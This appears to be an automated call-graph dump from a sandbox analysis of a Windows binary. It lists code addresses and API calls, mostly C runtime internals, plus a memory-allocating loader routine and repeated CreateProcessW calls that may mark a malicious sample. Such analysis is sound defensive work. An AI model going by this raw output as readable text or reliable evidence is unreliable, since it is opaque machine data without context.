16819->16826 16821 7fef9d38f5d 16820->16821 16822 7fef9d38f9b 16820->16822 16823 7fef9d2bd70 _invalid_parameter 17 API calls 16821->16823 16824 7fef9d3900e 16822->16824 16827 7fef9d3904c 16822->16827 16823->16826 16825 7fef9d2bd70 _invalid_parameter 17 API calls 16824->16825 16825->16826 16826->16756 16827->16826 16828 7fef9d2bd70 _invalid_parameter 17 API calls 16827->16828 16828->16826 16831 7fef9d386e6 16829->16831 16830 7fef9d3873c 16832 7fef9d2bd70 _invalid_parameter 17 API calls 16830->16832 16831->16830 16835 7fef9d3877a 16831->16835 16841 7fef9d38770 _calloc_dbg_impl 16832->16841 16833 7fef9d3880e 16838 7fef9d2bd70 _invalid_parameter 17 API calls 16833->16838 16834 7fef9d3884c 16836 7fef9d38992 16834->16836 16837 7fef9d38862 16834->16837 16835->16833 16835->16834 16835->16841 16839 7fef9d38350 _wcsftime_l 17 API calls 16836->16839 16844 7fef9d38350 16837->16844 16838->16841 16842 7fef9d388b1 _calloc_dbg_impl 16839->16842 16841->16759 16842->16841 16843 7fef9d2bd70 _invalid_parameter 17 API calls 16842->16843 16843->16841 16845 7fef9d3839b 16844->16845 16846 7fef9d383f1 16845->16846 16848 7fef9d3842f 16845->16848 16847 7fef9d2bd70 _invalid_parameter 17 API calls 16846->16847 16850 7fef9d38425 16847->16850 16849 7fef9d2bd70 _invalid_parameter 17 API calls 16848->16849 16848->16850 16849->16850 16850->16842 16852 7fef9d30ff7 16851->16852 16854 7fef9d30ff0 __SehTransFilter 16851->16854 16853 7fef9d31055 16852->16853 16856 7fef9d31093 _calloc_dbg_impl 16852->16856 16855 7fef9d2bd70 _invalid_parameter 17 API calls 16853->16855 16854->16799 16855->16854 16856->16854 16857 7fef9d3111a 16856->16857 16859 7fef9d31158 16856->16859 16858 7fef9d2bd70 _invalid_parameter 17 API calls 16857->16858 16858->16854 16859->16854 16860 7fef9d2bd70 _invalid_parameter 17 API calls 16859->16860 16860->16854 16863 7fef9d2d02a 16861->16863 16862 7fef9d2d1d8 DecodePointer 16864 7fef9d2d1e8 16862->16864 16863->16862 16866 7fef9d2bd70 _invalid_parameter 17 API calls 16863->16866 16865 7fef9d2ba2b 16864->16865 16867 7fef9d27090 _exit 33 API calls 16864->16867 16869 7fef9d2d209 16864->16869 16873 7fef9d27090 16865->16873 16868 7fef9d2d1ce 16866->16868 16867->16869 16868->16862 16868->16865 16871 7fef9d2d289 16869->16871 16876 7fef9d23d00 RtlEncodePointer 16869->16876 16871->16865 16877 7fef9d29360 LeaveCriticalSection 16871->16877 16874 7fef9d27280 _exit 33 API calls 16873->16874 16875 7fef9d270a9 16874->16875 16875->16790 16876->16871 16877->16865 16878 7fef9d2ae14 16879 7fef9d2b390 16878->16879 16880 7fef9d23280 __GSHandlerCheck 8 API calls 16879->16880 16881 7fef9d2b3a0 16880->16881 17919 7fef9d32c10 17920 7fef9d32c53 17919->17920 17921 7fef9d32c24 _updatetlocinfoEx_nolock 17919->17921 17923 7fef9d29360 LeaveCriticalSection 17921->17923 17923->17920 17924 7fef9d3d410 17929 7fef9d3d3e0 17924->17929 17927 7fef9d3d43c 17928 7fef9d3d710 _Ref_count LeaveCriticalSection 17928->17927 17932 7fef9d40070 17929->17932 17935 7fef9d40083 _free_nolock 17932->17935 17934 7fef9d3d402 17934->17927 17934->17928 17936 7fef9d29360 LeaveCriticalSection 17935->17936 17936->17934 18478 180024ee6 18479 180024eea 18478->18479 18480 180024f52 18478->18480 18481 18002506a CreateProcessW 18480->18481 17937 7fef9d27816 17940 7fef9d27826 _calloc_dbg 17937->17940 17938 7fef9d27ab9 17939 7fef9d27ce0 SetHandleCount 17938->17939 17943 7fef9d27b95 GetStdHandle 17938->17943 17945 7fef9d27c7b 17938->17945 17944 7fef9d27aaf 17939->17944 17940->17938 17941 7fef9d27a32 InitializeCriticalSectionAndSpinCount 17940->17941 17942 7fef9d27a19 GetFileType 17940->17942 17941->17938 17941->17944 17942->17938 17942->17941 17943->17945 17946 7fef9d27bb9 17943->17946 17945->17939 17946->17945 17947 7fef9d27bc8 GetFileType 17946->17947 17947->17945 17948 7fef9d27beb InitializeCriticalSectionAndSpinCount 17947->17948 17948->17944 17948->17945 16502 7fef9d2461b 16505 7fef9d24625 _calloc_dbg_impl 16502->16505 16504 7fef9d248be 16506 7fef9d29360 LeaveCriticalSection 16505->16506 16506->16504 16888 7fef9d36203 16889 7fef9d3616e _CrtMemDumpAllObjectsSince wcsxfrm 16888->16889 16890 7fef9d36238 MultiByteToWideChar 16889->16890 16891 7fef9d361c8 _LocaleUpdate::~_LocaleUpdate 16889->16891 16890->16891 16630 1800178f4 16633 18000ffc0 16630->16633 16632 180017924 16637 18001000e 16633->16637 16634 180011bd0 16645 1800053b0 16634->16645 16637->16634 16638 1800116b2 16637->16638 16639 18001667c 16637->16639 16638->16632 16640 1800166ac 16639->16640 16643 180016ad3 16640->16643 16649 180023624 16640->16649 16653 18000bc98 16640->16653 16657 1800270c0 16640->16657 16643->16637 16647 1800053e0 16645->16647 16646 18001a10c CreateProcessW 16648 18000598b 16646->16648 16647->16646 16647->16648 16648->16638 16652 180023662 16649->16652 16651 1800237ae 16651->16640 16652->16651 16661 18001a10c 16652->16661 16654 18000bcde 16653->16654 16655 18001a10c CreateProcessW 16654->16655 16656 18000c521 16654->16656 16655->16656 16656->16640 16660 180027157 16657->16660 16658 180027fe1 16658->16640 16659 18001a10c CreateProcessW 16659->16660 16660->16658 16660->16659 16662 18001a166 16661->16662 16663 180024f28 CreateProcessW 16662->16663 16664 18001a335 16663->16664 16664->16651 16892 7fef9d40204 16895 7fef9d4023d 16892->16895 16894 7fef9d403d7 16895->16894 16896 7fef9d40326 16895->16896 16898 7fef9d3ab10 16895->16898 16896->16894 16902 7fef9d39290 16896->16902 16899 7fef9d3ab23 16898->16899 16900 7fef9d3ab35 16898->16900 16899->16896 16900->16899 16901 7fef9d2bd70 _invalid_parameter 17 API calls 16900->16901 16901->16899 16903 7fef9d392d8 16902->16903 16908 7fef9d392b6 __doserrno 16902->16908 16904 7fef9d39341 __doserrno 16903->16904 16910 7fef9d3938c 16903->16910 16906 7fef9d2bd70 _invalid_parameter 17 API calls 16904->16906 16905 7fef9d3945b 16916 7fef9d3fae0 16905->16916 16906->16908 16908->16894 16910->16905 16911 7fef9d39410 __doserrno 16910->16911 16913 7fef9d2bd70 _invalid_parameter 17 API calls 16911->16913 16913->16908 16914 7fef9d394a6 __doserrno 16930 7fef9d3fbc0 LeaveCriticalSection 16914->16930 16917 7fef9d3fb7a 16916->16917 16920 7fef9d3fb25 16916->16920 16918 7fef9d39464 16917->16918 16919 7fef9d3fb81 EnterCriticalSection 16917->16919 16918->16914 16924 7fef9d39520 16918->16924 16919->16918 16921 7fef9d3fb56 16920->16921 16922 7fef9d3fb3b InitializeCriticalSectionAndSpinCount 16920->16922 16931 7fef9d29360 LeaveCriticalSection 16921->16931 16922->16921 16932 7fef9d3f900 16924->16932 16926 7fef9d39545 16927 7fef9d3959d SetFilePointer 16926->16927 16929 7fef9d39552 _dosmaperr 16926->16929 16928 7fef9d395c1 GetLastError 16927->16928 16927->16929 16928->16929 16929->16914 16930->16908 16931->16917 16933 7fef9d3f935 16932->16933 16935 7fef9d3f913 __doserrno 16932->16935 16934 7fef9d3f99e __doserrno 16933->16934 16937 7fef9d3f9e9 __doserrno 16933->16937 16936 7fef9d2bd70 _invalid_parameter 17 API calls 16934->16936 16935->16926 16936->16935 16937->16935 16938 7fef9d2bd70 _invalid_parameter 17 API calls 16937->16938 16938->16935 16939 7fef9d41200 16942 7fef9d2ed30 16939->16942 16941 7fef9d41212 _IsExceptionObjectToBeDestroyed __SehTransFilter 16943 7fef9d2ed3e 16942->16943 16945 7fef9d2ed4c 16943->16945 16948 7fef9d2cf80 DecodePointer 16943->16948 16946 7fef9d2cf80 _inconsistency 36 API calls 16945->16946 16947 7fef9d2ed88 16945->16947 16946->16947 16947->16941 16949 7fef9d2cf9e 16948->16949 16952 7fef9d2cf50 16949->16952 16954 7fef9d2cf59 16952->16954 16956 7fef9d339e0 16954->16956 16957 7fef9d339fa 16956->16957 16966 7fef9d2d430 DecodePointer 16957->16966 16959 7fef9d33a09 16960 7fef9d33a20 16959->16960 16961 7fef9d2cff0 terminate 34 API calls 16959->16961 16962 7fef9d33a42 16960->16962 16963 7fef9d2be50 _invoke_watson_if_error 14 API calls 16960->16963 16961->16960 16964 7fef9d27090 _exit 33 API calls 16962->16964 16963->16962 16965 7fef9d2cf78 16964->16965 16965->16945 16966->16959 17463 7fef9d23909 17464 7fef9d23913 __SehTransFilter 17463->17464 17465 7fef9d239db __SehTransFilter 17464->17465 17466 7fef9d23a71 RtlUnwindEx 17464->17466 17466->17465 17955 7fef9d23409 17956 7fef9d23e00 3 API calls 17955->17956 17957 7fef9d2340e 17956->17957 17960 7fef9d288d0 HeapDestroy 17957->17960 17959 7fef9d23413 17960->17959 18523 7fef9d3c30d 18524 7fef9d3c31a get_int64_arg _get_printf_count_output 18523->18524 18525 7fef9d3c39d 18524->18525 18526 7fef9d3c3f2 18524->18526 18527 7fef9d2bd70 _invalid_parameter 17 API calls 18525->18527 18533 7fef9d3b530 wctomb_s 19 API calls 18526->18533 18535 7fef9d3b99c 18526->18535 18530 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 18527->18530 18528 7fef9d3cc93 18528->18530 18532 7fef9d2bd70 _invalid_parameter 17 API calls 18528->18532 18529 7fef9d23280 __GSHandlerCheck 8 API calls 18531 7fef9d3cd90 18529->18531 18530->18529 18532->18530 18533->18526 18534 7fef9d3bada 18536 7fef9d2bd70 _invalid_parameter 17 API calls 18534->18536 18535->18528 18535->18534 18536->18530 16670 1d0000 16671 1d0183 16670->16671 16672 1d043e VirtualAlloc 16671->16672 16675 1d0462 16672->16675 16673 1d0531 GetNativeSystemInfo 16674 1d056d VirtualAlloc 16673->16674 16676 1d0a00 16673->16676 16678 1d058b 16674->16678 16675->16673 16675->16676 16677 1d09d9 VirtualProtect 16677->16678 16678->16676 16678->16677 16419 7fef9d23d30 16437 7fef9d27540 16419->16437 16424 7fef9d23d4e FlsAlloc 16427 7fef9d23d73 _calloc_dbg 16424->16427 16428 7fef9d23d6a 16424->16428 16425 7fef9d23d42 16426 7fef9d23e00 3 API calls 16425->16426 16429 7fef9d23d47 16426->16429 16431 7fef9d23da4 FlsSetValue 16427->16431 16432 7fef9d23db9 16427->16432 16430 7fef9d23e00 3 API calls 16428->16430 16430->16429 16431->16432 16433 7fef9d23dc2 16431->16433 16434 7fef9d23e00 3 API calls 16432->16434 16446 7fef9d23e30 16433->16446 16434->16429 16452 7fef9d23d00 RtlEncodePointer 16437->16452 16439 7fef9d27549 _initp_misc_winsig 16453 7fef9d2cf20 EncodePointer 16439->16453 16441 7fef9d23d39 16442 7fef9d28fe0 16441->16442 16445 7fef9d28ff6 16442->16445 16443 7fef9d29022 InitializeCriticalSectionAndSpinCount 16444 7fef9d23d3e 16443->16444 16443->16445 16444->16424 16444->16425 16445->16443 16445->16444 16447 7fef9d23ead 16446->16447 16454 7fef9d29360 LeaveCriticalSection 16447->16454 16449 7fef9d23ec7 _updatetlocinfoEx_nolock 16455 7fef9d29360 LeaveCriticalSection 16449->16455 16451 7fef9d23dce GetCurrentThreadId 16451->16429 16452->16439 16453->16441 16454->16449 16455->16451 17467 7fef9d23130 17468 7fef9d23170 __GSHandlerCheck 8 API calls 17467->17468 17469 7fef9d23160 17468->17469 17961 7fef9d2e830 17962 7fef9d2e857 17961->17962 17963 7fef9d33cc0 __SehTransFilter 39 API calls 17962->17963 17964 7fef9d2e8e3 17963->17964 17965 7fef9d3c435 17966 7fef9d3c479 _CrtMemDumpAllObjectsSince 17965->17966 17967 7fef9d3c598 DecodePointer 17966->17967 17968 7fef9d3c60d _CrtMemDumpAllObjectsSince 17967->17968 17969 7fef9d3c62b DecodePointer 17968->17969 17970 7fef9d3c652 _CrtMemDumpAllObjectsSince 17968->17970 17969->17970 17971 7fef9d3c676 DecodePointer 17970->17971 17980 7fef9d3c69d std::exception::_Copy_str 17970->17980 17971->17980 17972 7fef9d3b99c 17973 7fef9d3cc93 17972->17973 17978 7fef9d3bada 17972->17978 17974 7fef9d2bd70 _invalid_parameter 17 API calls 17973->17974 17977 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 17973->17977 17974->17977 17975 7fef9d3b530 wctomb_s 19 API calls 17975->17980 17976 7fef9d23280 __GSHandlerCheck 8 API calls 17979 7fef9d3cd90 17976->17979 17977->17976 17981 7fef9d2bd70 _invalid_parameter 17 API calls 17978->17981 17980->17972 17980->17975 17981->17977 16465 7fef9d23433 16466 7fef9d23437 16465->16466 16467 7fef9d23446 16465->16467 16468 7fef9d27d00 _ioterm DeleteCriticalSection 16466->16468 16469 7fef9d2343c 16468->16469 16470 7fef9d23e00 3 API calls 16469->16470 16471 7fef9d23441 16470->16471 16473 7fef9d288d0 HeapDestroy 16471->16473 16473->16467 17982 7fef9d3d830 17983 7fef9d3d8aa 17982->17983 17984 7fef9d3d97b 17983->17984 17985 7fef9d3d926 17983->17985 17987 7fef9d3d9ee 17984->17987 17993 7fef9d3da43 17984->17993 17986 7fef9d2bd70 _invalid_parameter 17 API calls 17985->17986 17990 7fef9d3d95a _LocaleUpdate::~_LocaleUpdate 17986->17990 17988 7fef9d2bd70 _invalid_parameter 17 API calls 17987->17988 17988->17990 17989 7fef9d23280 __GSHandlerCheck 8 API calls 17991 7fef9d3ed9e 17989->17991 17990->17989 17992 7fef9d3eca1 17992->17990 17994 7fef9d2bd70 _invalid_parameter 17 API calls 17992->17994 17993->17992 17995 7fef9d3dbb5 17993->17995 17994->17990 17996 7fef9d2bd70 _invalid_parameter 17 API calls 17995->17996 17996->17990 17997 7fef9d26c32 17998 7fef9d26c3c 17997->17998 17999 7fef9d26e25 _LocaleUpdate::~_LocaleUpdate 17998->17999 18000 7fef9d26c7a _CrtMemDumpAllObjectsSince 17998->18000 18001 7fef9d23280 __GSHandlerCheck 8 API calls 17999->18001 18003 7fef9d2c260 _CrtMemDumpAllObjectsSince_stat 3 API calls 18000->18003 18004 7fef9d26ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 18000->18004 18002 7fef9d26e89 18001->18002 18003->18004 18005 7fef9d2c0c0 _swprintf_p 17 API calls 18004->18005 18007 7fef9d26dc7 18005->18007 18006 7fef9d26e12 18007->18006 18008 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18007->18008 18008->18006 16976 7fef9d33e3b 16977 7fef9d33ec7 16976->16977 16980 7fef9d2e790 16977->16980 16987 7fef9d2e500 16980->16987 16984 7fef9d2e7d0 __SehTransFilter 16995 7fef9d34f20 16984->16995 16986 7fef9d2e81e 16988 7fef9d33b40 __StateFromControlPc 36 API calls 16987->16988 16989 7fef9d2e539 16988->16989 16990 7fef9d2e5c2 RtlLookupFunctionEntry 16989->16990 16991 7fef9d2e601 16989->16991 16990->16991 16992 7fef9d33b40 16991->16992 17002 7fef9d33a60 16992->17002 17008 7fef9d33b70 16995->17008 16997 7fef9d2cf80 _inconsistency 36 API calls 17001 7fef9d34f55 __SehTransFilter _SetImageBase __SetState 16997->17001 16998 7fef9d35103 16999 7fef9d3514a __SetState 16998->16999 17000 7fef9d2cf80 _inconsistency 36 API calls 16998->17000 16999->16986 17000->16999 17001->16997 17001->16998 17003 7fef9d33a7b 17002->17003 17004 7fef9d33a7d 17002->17004 17006 7fef9d2cf80 _inconsistency 36 API calls 17003->17006 17007 7fef9d33aa5 17003->17007 17005 7fef9d2cf80 _inconsistency 36 API calls 17004->17005 17005->17003 17006->17007 17007->16984 17009 7fef9d33b9a 17008->17009 17010 7fef9d33ba9 17008->17010 17011 7fef9d33b40 __StateFromControlPc 36 API calls 17009->17011 17010->17001 17011->17010 16495 18001a10c 16496 18001a166 16495->16496 16499 180024f28 16496->16499 16498 18001a335 16500 180024fcb 16499->16500 16501 18002506a CreateProcessW 16500->16501 16501->16498 18009 7fef9d2443c 18010 7fef9d2444c 18009->18010 18013 7fef9d29360 LeaveCriticalSection 18010->18013 18012 7fef9d248be 18013->18012 17490 7fef9d39939 17491 7fef9d39951 __doserrno 17490->17491 17492 7fef9d2bd70 _invalid_parameter 17 API calls 17491->17492 17493 7fef9d399d7 17492->17493 17494 7fef9d23280 __GSHandlerCheck 8 API calls 17493->17494 17495 7fef9d3a9f5 17494->17495 18014 7fef9d3e424 18015 7fef9d3e469 _CrtMemDumpAllObjectsSince 18014->18015 18016 7fef9d3e588 DecodePointer 18015->18016 18017 7fef9d3e5fd _CrtMemDumpAllObjectsSince 18016->18017 18018 7fef9d3e61b DecodePointer 18017->18018 18019 7fef9d3e642 _CrtMemDumpAllObjectsSince 18017->18019 18018->18019 18020 7fef9d3e666 DecodePointer 18019->18020 18022 7fef9d3e68d std::exception::_Copy_str 18019->18022 18020->18022 18021 7fef9d3eadf 18024 7fef9d3ef10 25 API calls 18021->18024 18022->18021 18023 7fef9d3eec0 25 API calls 18022->18023 18031 7fef9d3da75 18022->18031 18023->18021 18025 7fef9d3eafd 18024->18025 18026 7fef9d3eb33 18025->18026 18028 7fef9d3eec0 25 API calls 18025->18028 18027 7fef9d3ec29 18026->18027 18041 7fef9d3eb49 _CrtMemDumpAllObjectsSince 18026->18041 18029 7fef9d3ebda 18027->18029 18030 7fef9d3ef10 25 API calls 18027->18030 18028->18026 18029->18031 18034 7fef9d3eec0 25 API calls 18029->18034 18030->18029 18032 7fef9d3eca1 18031->18032 18037 7fef9d3dbb5 18031->18037 18033 7fef9d2bd70 _invalid_parameter 17 API calls 18032->18033 18036 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 18032->18036 18033->18036 18034->18031 18035 7fef9d23280 __GSHandlerCheck 8 API calls 18038 7fef9d3ed9e 18035->18038 18036->18035 18040 7fef9d2bd70 _invalid_parameter 17 API calls 18037->18040 18039 7fef9d3f000 wcsxfrm 2 API calls 18039->18041 18040->18036 18041->18029 18041->18039 18042 7fef9d3ee40 25 API calls 18041->18042 18042->18041 17012 7fef9d25a25 17013 7fef9d25a37 17012->17013 17014 7fef9d2bd70 _invalid_parameter 17 API calls 17013->17014 17015 7fef9d25aaf 17014->17015 17496 7fef9d34920 17499 7fef9d3d530 17496->17499 17502 7fef9d3d580 17499->17502 17503 7fef9d3d59a std::exception::_Tidy 17502->17503 17505 7fef9d3493d 17502->17505 17503->17505 17506 7fef9d3d660 17503->17506 17507 7fef9d3d676 std::exception::_Copy_str malloc 17506->17507 17509 7fef9d3d6bf 17506->17509 17508 7fef9d2d490 std::exception::_Copy_str 17 API calls 17507->17508 17507->17509 17508->17509 17509->17505 18545 7fef9d29328 18546 7fef9d29336 EnterCriticalSection 18545->18546 18547 7fef9d2932c 18545->18547 18547->18546 18548 7fef9d3ff2d 18549 7fef9d3ff37 18548->18549 18550 7fef9d40042 18549->18550 18551 7fef9d3ff47 18549->18551 18563 7fef9d29360 LeaveCriticalSection 18550->18563 18552 7fef9d4003d 18551->18552 18555 7fef9d3ae90 _lock_file2 EnterCriticalSection 18551->18555 18554 7fef9d4004c 18557 7fef9d3ff97 18555->18557 18556 7fef9d3ffd0 18558 7fef9d3af60 _unlock_file2 2 API calls 18556->18558 18557->18556 18559 7fef9d3ffe1 18557->18559 18560 7fef9d3ffbb 18557->18560 18558->18552 18559->18556 18562 7fef9d3fd70 _fflush_nolock 25 API calls 18559->18562 18561 7fef9d3fd70 _fflush_nolock 25 API calls 18560->18561 18561->18556 18562->18556 18563->18554 17514 7fef9d2b12b 17515 7fef9d2b14c 17514->17515 17517 7fef9d2b2e0 17515->17517 17518 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 17515->17518 17516 7fef9d2b33e 17530 7fef9d30cc0 17516->17530 17517->17516 17519 7fef9d2d490 std::exception::_Copy_str 17 API calls 17517->17519 17518->17517 17521 7fef9d2b311 17519->17521 17523 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17521->17523 17523->17516 17524 7fef9d2b37d 17528 7fef9d23280 __GSHandlerCheck 8 API calls 17524->17528 17525 7fef9d2cff0 terminate 34 API calls 17526 7fef9d2b373 17525->17526 17527 7fef9d27090 _exit 33 API calls 17526->17527 17527->17524 17529 7fef9d2b3a0 17528->17529 17548 7fef9d23d00 RtlEncodePointer 17530->17548 17532 7fef9d30cf6 17533 7fef9d30d23 LoadLibraryW 17532->17533 17534 7fef9d30e15 17532->17534 17535 7fef9d30d44 GetProcAddress 17533->17535 17543 7fef9d30d3d 17533->17543 17537 7fef9d30e39 DecodePointer DecodePointer 17534->17537 17547 7fef9d30e68 17534->17547 17536 7fef9d30d6a 7 API calls 17535->17536 17535->17543 17536->17534 17540 7fef9d30df3 GetProcAddress EncodePointer 17536->17540 17537->17547 17538 7fef9d30f60 DecodePointer 17538->17543 17539 7fef9d23280 __GSHandlerCheck 8 API calls 17544 7fef9d2b358 17539->17544 17540->17534 17541 7fef9d30eed DecodePointer 17542 7fef9d30f0d 17541->17542 17542->17538 17545 7fef9d30f2f DecodePointer 17542->17545 17543->17539 17544->17524 17544->17525 17545->17538 17546 7fef9d30ec8 17545->17546 17546->17538 17547->17541 17547->17542 17547->17546 17548->17532 17549 7fef9d234d5 17550 7fef9d234da _calloc_dbg 17549->17550 17551 7fef9d2350b FlsSetValue 17550->17551 17555 7fef9d23548 17550->17555 17552 7fef9d23520 17551->17552 17551->17555 17553 7fef9d23e30 LeaveCriticalSection 17552->17553 17554 7fef9d2352c GetCurrentThreadId 17553->17554 17554->17555 18564 7fef9d25ad9 18565 7fef9d25add 18564->18565 18566 7fef9d26380 _CrtIsValidHeapPointer HeapValidate 18565->18566 18567 7fef9d25b3a 18566->18567 18570 7fef9d29360 LeaveCriticalSection 18567->18570 18569 7fef9d25c14 18570->18569 18043 7fef9d233d6 18046 7fef9d288d0 HeapDestroy 18043->18046 18045 7fef9d233db 18046->18045 18582 7fef9d266da 18583 7fef9d26725 18582->18583 18586 7fef9d26745 18582->18586 18583->18586 18588 7fef9d29a70 18583->18588 18584 7fef9d2677f 18586->18584 18587 7fef9d29b10 __updatetmbcinfo LeaveCriticalSection 18586->18587 18587->18584 18590 7fef9d29a79 _updatetlocinfoEx_nolock 18588->18590 18589 7fef9d29ad8 18589->18586 18590->18589 18592 7fef9d29360 LeaveCriticalSection 18590->18592 18592->18589 17556 7fef9d268c4 17557 7fef9d268d1 17556->17557 17558 7fef9d26ba6 17557->17558 17561 7fef9d268ed _CrtIsValidPointer 17557->17561 17574 7fef9d29360 LeaveCriticalSection 17558->17574 17560 7fef9d26bb0 17562 7fef9d2695e IsBadReadPtr 17561->17562 17564 7fef9d26976 17561->17564 17573 7fef9d2692f 17561->17573 17562->17564 17563 7fef9d26ad2 17566 7fef9d26b2d 17563->17566 17567 7fef9d26add 17563->17567 17564->17563 17565 7fef9d26a29 17564->17565 17568 7fef9d26abe 17565->17568 17569 7fef9d26a86 IsBadReadPtr 17565->17569 17572 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 17566->17572 17566->17573 17571 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 17567->17571 17570 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 17568->17570 17569->17568 17569->17573 17570->17573 17571->17573 17572->17573 17574->17560 18593 7fef9d376c0 18594 7fef9d376cf _CrtMemDumpAllObjectsSince 18593->18594 18595 7fef9d37be3 _CrtMemDumpAllObjectsSince 18593->18595 18597 7fef9d376e6 _LocaleUpdate::~_LocaleUpdate 18594->18597 18598 7fef9d37905 _CrtMemDumpAllObjectsSince 18594->18598 18599 7fef9d377f5 _CrtMemDumpAllObjectsSince wcsncnt 18594->18599 18596 7fef9d37cc6 WideCharToMultiByte 18595->18596 18595->18597 18596->18597 18600 7fef9d23280 __GSHandlerCheck 8 API calls 18597->18600 18601 7fef9d3790f WideCharToMultiByte 18598->18601 18604 7fef9d37827 WideCharToMultiByte 18599->18604 18602 7fef9d37d85 18600->18602 18603 7fef9d37965 18601->18603 18603->18597 18605 7fef9d3799a GetLastError 18603->18605 18604->18597 18605->18597 18607 7fef9d379d3 _CrtMemDumpAllObjectsSince 18605->18607 18606 7fef9d37a05 WideCharToMultiByte 18606->18597 18606->18607 18607->18597 18607->18606 18059 7fef9d2f7f1 18060 7fef9d2f80d 18059->18060 18080 7fef9d2f8de _wcsftime_l 18059->18080 18116 7fef9d36fb0 18060->18116 18062 7fef9d2fa70 18123 7fef9d369c0 18062->18123 18064 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18067 7fef9d2f85a OutputDebugStringA 18064->18067 18066 7fef9d2f9f4 18066->18062 18069 7fef9d2d490 std::exception::_Copy_str 17 API calls 18066->18069 18070 7fef9d2f872 OutputDebugStringA OutputDebugStringA OutputDebugStringA OutputDebugStringA 18067->18070 18068 7fef9d2fa8a 18071 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18068->18071 18072 7fef9d2fa43 18069->18072 18076 7fef9d2f8ce 18070->18076 18074 7fef9d2fab7 18071->18074 18075 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18072->18075 18077 7fef9d2fb24 18074->18077 18078 7fef9d369c0 17 API calls 18074->18078 18092 7fef9d2fb6a 18074->18092 18075->18062 18085 7fef9d23280 __GSHandlerCheck 8 API calls 18076->18085 18079 7fef9d369c0 17 API calls 18077->18079 18081 7fef9d2faf7 18078->18081 18082 7fef9d2fb3d 18079->18082 18080->18066 18086 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18080->18086 18087 7fef9d2f996 18080->18087 18083 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18081->18083 18084 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18082->18084 18083->18077 18084->18092 18088 7fef9d3011d 18085->18088 18086->18087 18087->18066 18089 7fef9d2d490 std::exception::_Copy_str 17 API calls 18087->18089 18090 7fef9d2f9c7 18089->18090 18091 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18090->18091 18091->18066 18093 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18092->18093 18094 7fef9d2fc39 18092->18094 18093->18094 18095 7fef9d2fc97 18094->18095 18096 7fef9d2d490 std::exception::_Copy_str 17 API calls 18094->18096 18136 7fef9d36970 18095->18136 18097 7fef9d2fc6a 18096->18097 18099 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18097->18099 18099->18095 18101 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18102 7fef9d2fd6e 18101->18102 18103 7fef9d2fdbb 18102->18103 18104 7fef9d31640 17 API calls 18102->18104 18106 7fef9d2ff03 std::exception::_Copy_str 18103->18106 18139 7fef9d29360 LeaveCriticalSection 18103->18139 18105 7fef9d2fd8e 18104->18105 18107 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18105->18107 18106->18076 18108 7fef9d2ffef 18106->18108 18112 7fef9d2ffaa WriteFile 18106->18112 18107->18103 18109 7fef9d30008 OutputDebugStringA 18108->18109 18110 7fef9d30016 18108->18110 18109->18110 18110->18076 18113 7fef9d36fb0 _itow_s 17 API calls 18110->18113 18112->18108 18114 7fef9d30065 18113->18114 18115 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18114->18115 18115->18076 18117 7fef9d37003 18116->18117 18118 7fef9d36fd6 18116->18118 18120 7fef9d37030 _itow_s 17 API calls 18117->18120 18118->18117 18119 7fef9d36fdd 18118->18119 18140 7fef9d37030 18119->18140 18122 7fef9d2f82d 18120->18122 18122->18064 18124 7fef9d369e1 18123->18124 18125 7fef9d36a42 18124->18125 18127 7fef9d36a80 _calloc_dbg_impl 18124->18127 18126 7fef9d2bd70 _invalid_parameter 17 API calls 18125->18126 18132 7fef9d36a76 _calloc_dbg_impl 18126->18132 18128 7fef9d36b6e 18127->18128 18129 7fef9d36bac _calloc_dbg_impl 18127->18129 18130 7fef9d2bd70 _invalid_parameter 17 API calls 18128->18130 18131 7fef9d36ce8 18129->18131 18134 7fef9d36d26 _calloc_dbg_impl 18129->18134 18130->18132 18133 7fef9d2bd70 _invalid_parameter 17 API calls 18131->18133 18132->18068 18133->18132 18134->18132 18135 7fef9d2bd70 _invalid_parameter 17 API calls 18134->18135 18135->18132 18156 7fef9d363e0 18136->18156 18138 7fef9d2fd20 18138->18101 18139->18106 18141 7fef9d37055 18140->18141 18142 7fef9d370ab 18141->18142 18143 7fef9d370e9 18141->18143 18144 7fef9d2bd70 _invalid_parameter 17 API calls 18142->18144 18145 7fef9d3714a 18143->18145 18148 7fef9d37188 _calloc_dbg_impl 18143->18148 18153 7fef9d370df 18144->18153 18146 7fef9d2bd70 _invalid_parameter 17 API calls 18145->18146 18146->18153 18147 7fef9d37287 18149 7fef9d2bd70 _invalid_parameter 17 API calls 18147->18149 18148->18147 18151 7fef9d372c5 18148->18151 18149->18153 18150 7fef9d37338 18152 7fef9d2bd70 _invalid_parameter 17 API calls 18150->18152 18151->18150 18154 7fef9d37376 18151->18154 18152->18153 18153->18122 18154->18153 18155 7fef9d2bd70 _invalid_parameter 17 API calls 18154->18155 18155->18153 18157 7fef9d3640e 18156->18157 18158 7fef9d3648e 18157->18158 18160 7fef9d364cc _calloc_dbg_impl 18157->18160 18159 7fef9d2bd70 _invalid_parameter 17 API calls 18158->18159 18166 7fef9d364c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 18159->18166 18161 7fef9d3668e _CrtMemDumpAllObjectsSince 18160->18161 18162 7fef9d3663f 18160->18162 18168 7fef9d35ea0 18161->18168 18163 7fef9d2bd70 _invalid_parameter 17 API calls 18162->18163 18163->18166 18165 7fef9d366b5 _calloc_dbg_impl 18165->18166 18167 7fef9d2bd70 